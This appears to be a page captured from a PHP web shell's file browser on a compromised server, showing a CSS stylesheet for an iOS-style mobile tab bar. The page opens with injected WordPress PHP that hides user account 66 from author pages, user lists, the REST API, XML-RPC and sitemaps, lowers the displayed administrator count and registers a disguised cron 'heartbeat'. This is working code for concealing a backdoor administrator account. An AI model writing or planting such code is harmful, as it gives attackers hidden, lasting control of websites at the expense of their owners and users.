add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/emajiwallet/public/css/ |
Upload File : |
/* ============================================
iOS Tab Bar Navigation
============================================ */
/* Hide top navbar on mobile ONLY when tab bar is present (authenticated users) */
@media (max-width: 768px) {
body.has-tab-bar .navbar.navbar-light {
display: none;
}
}
/* iOS Bottom Tab Bar */
.ios-tab-bar {
position: fixed;
bottom: 0;
left: 0;
right: 0;
background: rgba(255, 255, 255, 0.85);
backdrop-filter: blur(40px) saturate(180%);
-webkit-backdrop-filter: blur(40px) saturate(180%);
border-top: 0.5px solid rgba(0, 0, 0, 0.1);
padding: 8px 0 max(8px, env(safe-area-inset-bottom));
z-index: 1000;
box-shadow: 0 -2px 10px rgba(0, 0, 0, 0.05);
}
.ios-tab-bar-inner {
display: flex;
justify-content: space-around;
align-items: center;
max-width: 430px;
margin: 0 auto;
padding: 0 8px;
}
.ios-tab-item {
flex: 1;
display: flex;
flex-direction: column;
align-items: center;
padding: 4px 8px;
text-decoration: none;
color: var(--ios-text-tertiary);
transition: all 0.2s ease;
position: relative;
}
.ios-tab-item i {
font-size: 24px;
margin-bottom: 2px;
transition: all 0.2s ease;
}
.ios-tab-item span {
font-size: 10px;
font-weight: 500;
letter-spacing: -0.1px;
}
.ios-tab-item.active {
color: var(--ios-blue);
}
.ios-tab-item.active i {
transform: scale(1.05);
}
.ios-tab-item:active {
opacity: 0.6;
transform: scale(0.95);
}
/* Add space at bottom of content for tab bar */
body {
padding-bottom: env(safe-area-inset-bottom, 0);
}
.glass-container {
padding-bottom: 80px; /* Space for tab bar on mobile */
}
/* Desktop: Keep top navbar */
@media (min-width: 769px) {
.ios-tab-bar {
display: none;
}
.glass-container {
padding-bottom: 0;
}
}
/* Large Screen Header - More iOS-like */
@media (min-width: 769px) {
.navbar {
padding: 16px 24px;
}
.navbar-brand {
font-size: 22px;
font-weight: 700;
letter-spacing: -0.5px;
}
.navbar-nav {
gap: 4px;
}
.nav-link {
font-size: 17px;
font-weight: 500;
padding: 8px 16px !important;
border-radius: var(--radius-sm);
transition: all 0.2s ease;
}
.nav-link:hover {
background: rgba(0, 122, 255, 0.1);
color: var(--ios-blue) !important;
transform: translateY(-1px);
}
.nav-link.active {
background: rgba(0, 122, 255, 0.15);
color: var(--ios-blue) !important;
font-weight: 600;
}
}
/* Profile Button in Tab Bar */
.ios-tab-item.profile-item {
position: relative;
}
.ios-tab-item.profile-item::before {
content: '';
position: absolute;
top: 2px;
left: 50%;
transform: translateX(-50%);
width: 32px;
height: 32px;
background: linear-gradient(135deg, var(--ios-blue), var(--ios-purple));
border-radius: 50%;
opacity: 0.15;
}
.ios-tab-item.profile-item.active::before {
opacity: 0.25;
}
/* Safe Area for iPhone X+ */
@supports (padding: max(0px)) {
.ios-tab-bar {
padding-bottom: max(8px, env(safe-area-inset-bottom));
}
}
/* Badge for notifications */
.ios-tab-badge {
position: absolute;
top: 0;
right: 20%;
background: var(--ios-red);
color: white;
font-size: 10px;
font-weight: 700;
padding: 2px 5px;
border-radius: 10px;
min-width: 18px;
text-align: center;
box-shadow: 0 2px 4px rgba(255, 59, 48, 0.3);
}
/* Smooth page transitions */
.page-content {
animation: fadeInUp 0.3s ease;
}
@keyframes fadeInUp {
from {
opacity: 0;
transform: translateY(10px);
}
to {
opacity: 1;
transform: translateY(0);
}
}
/* iOS Pull-to-refresh indicator style */
.ios-refresh-indicator {
position: fixed;
top: 60px;
left: 50%;
transform: translateX(-50%);
color: var(--ios-text-tertiary);
font-size: 20px;
opacity: 0;
transition: opacity 0.2s;
}
.ios-refresh-indicator.visible {
opacity: 1;
}
/* Hamburger menu for desktop collapsed state */
.navbar-toggler {
border: none;
padding: 8px;
border-radius: var(--radius-xs);
}
.navbar-toggler:focus {
box-shadow: none;
background: rgba(0, 0, 0, 0.05);
}
.navbar-toggler-icon {
width: 24px;
height: 24px;
}
/* Collapsible menu styling */
.navbar-collapse {
margin-top: 16px;
}
@media (max-width: 768px) {
.navbar-collapse {
background: rgba(255, 255, 255, 0.95);
backdrop-filter: blur(20px);
border-radius: var(--radius-md);
padding: 16px;
margin-top: 16px;
box-shadow: var(--shadow-md);
}
.navbar-nav {
gap: 8px;
}
.nav-link {
padding: 12px 16px !important;
border-radius: var(--radius-sm);
}
.d-flex.align-items-center {
}
h6 {
margin-bottom: 12px;
}
.d-flex.align-items-center .btn {
width: 100%;
margin: 4px 0 !important;
}
}
/* Large title style (iOS 11+) */
.ios-large-title {
font-size: 34px;
font-weight: 700;
letter-spacing: -0.5px;
margin-bottom: 4px;
padding-top: 8px;
}
@media (max-width: 768px) {
.ios-large-title {
font-size: 28px;
}
}
/* Toolbar style for page actions */
.ios-toolbar {
display: flex;
gap: 8px;
margin-bottom: 16px;
flex-wrap: wrap;
}
.ios-toolbar .btn {
border-radius: var(--radius-sm);
font-size: 15px;
padding: 8px 16px;
}